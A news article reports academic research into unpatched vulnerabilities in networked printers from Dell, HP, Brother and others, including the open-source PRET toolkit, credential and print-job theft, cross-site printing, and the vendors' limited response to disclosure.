New research published by academics has resurfaced several serious vulnerabilities in popular internet-connected printers, which if exploited could allow an attacker to remotely steal sensitive documents from print jobs.
The research published six security disclosures along with a blog, a wiki, and an open-source toolkit, which could be used to allow the user to easily steal passwords, shut down and hijack networked printers, and remotely steal stored copies of printed documents.
At least 20 network printers built by Dell, HP, Lexmark, Brother, Samsung, and others were confirmed to have been affected, the researchers said, by previously-discovered security vulnerabilities that have remained unpatched for several years.
One of the researchers, speaking to me on Monday, said many more devices could be affected.
"I was searching for a topic for a master's thesis, and printers seems a good catch -- [there were] not many scientific publications yet, while the generic danger of printing languages like PostScript was already somehow known for decades," said Jens Müller in an email.
Müller, who worked with his colleagues Vladislav Mladenov and Juraj Somorovsky, spent a year working on the toolkit, dubbed Printer Exploitation Toolkit (or "PRET"), which at its heart allows the user to connect to an affected printer remotely or by USB and exploit the features of one of three common printer languages, such as PostScript and PJL.
The toolkit translates simple commands into one of the complex printer languages and returns a simple, easy-to-understand format.
All the toolkit needs is a valid target, such as an IP address of a vulnerable printer.
A cursory search on Shodan, a search engine for open and unsecured databases and devices, lists tens of thousands of devices in the US alone.
A successful attack could allow an attacker to siphon off the printer's memory to access print jobs of potentially sensitive files, like contracts, corporate information, or patient information.
Worse, the researchers say, is that an attacker could use one of the age-old bugs to read the printer's network credentials, such as for email sharing, or other corporate accounts if the printer is used for other functions, like scanning and faxing.
"This way an attacker can escalate her way into a network, using the printer device as a starting point," said the researchers in the blog post. Some printers "have not limited this feature to a certain directory, which leads to the disclosure of sensitive information like passwords," they said.
That advisory says a number of Brother and Konica Minolta printers are affected by the flaw.
Müller said the bug is "pretty easy to reproduce," but it still hasn't been fixed, years after it was first discovered. He added that the bug "seems to be present in all Brother-based laser printers we could test so far".
The researchers also found Müller called a "novel approach" to leaking captured print jobs from a printer using a victim's web browser as a carrier for the data. This, the researcher says, can allow attacks to "go beyond typical printers," like Google Cloud Print or document processing websites.
All of the vendors of affected devices were informed in October, but only Dell responded -- though the researchers say the company did not follow up.
But Müller said it was not clear exactly who was to blame.
"For attacks against standard PostScript and PJL features, the printer manufacturer is not really responsible," he said, because the "standard is flawed". In the case of cross-site printing attacks, the browser vendors are not to blame either.
Google rewarded the group's findings with $3133.70.
The research will be formally presented at Ruhr University Bochum's RuhrSec security conference in May.